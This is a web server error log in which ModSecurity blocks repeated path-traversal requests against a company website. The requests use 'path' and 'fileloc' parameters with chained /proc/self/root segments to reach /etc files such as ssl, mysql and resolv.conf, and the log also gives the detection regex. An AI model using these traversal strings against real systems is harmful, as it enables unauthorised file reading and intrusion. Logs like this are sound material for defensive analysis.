[Wed Mar 18 06:02:41.468696 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:56886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqMcdf6f5d65gmYZShqwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:03:31.497904 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:57070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqY8df6f5d65gmYZSh4gAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:04:04.101616 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:59992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqhCmAPhZkrhU8w4k-NwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:04:12.748928 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:46730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqjOyqAr6etmhZHNqLDAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:04:14.119502 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:50788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqjgkwaGbbGflqUZDglwAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:04:19.465762 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:48848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqk9a6ubjKNq_cu4Zl_AAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:04:26.137067 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:41298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqmkzinOy1jxa1j4fh0wAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:04:27.564509 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:41314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqmymAPhZkrhU8w4k-RgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:04:28.935502 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:41326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqnOw_le52K8_3pV2whgAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:04:32.729658 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:50794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqoCmAPhZkrhU8w4k-SwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:04:37.568319 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:52550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqpeyqAr6etmhZHNqLFgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:05:03.675824 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:44674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqv0zinOy1jxa1j4fh9wAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:05:13.103515 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:58514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqydY0UrI5A3LftIxmwAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:05:16.961979 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:48606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpqzOoXxyEfFpUF8f88EQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:05:23.015081 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:48622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpq0ymAPhZkrhU8w4k-bgAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:05:24.444608 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:43520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpq1Ow_le52K8_3pV2wtAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:05:26.792028 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:56764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpq1kzinOy1jxa1j4fiDwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:05:46.835491 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:41128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpq6uoXxyEfFpUF8f88NQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:05:55.882471 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:40238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpq80zinOy1jxa1j4fiJAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:06:37.254933 2026] [mime_magic:error] [pid 30077:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:40254] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user
[Wed Mar 18 06:06:57.078962 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:42380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprL-oXxyEfFpUF8f88bwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:07:04.275543 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:39858] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprOEzinOy1jxa1j4fiRQAAAQc"]
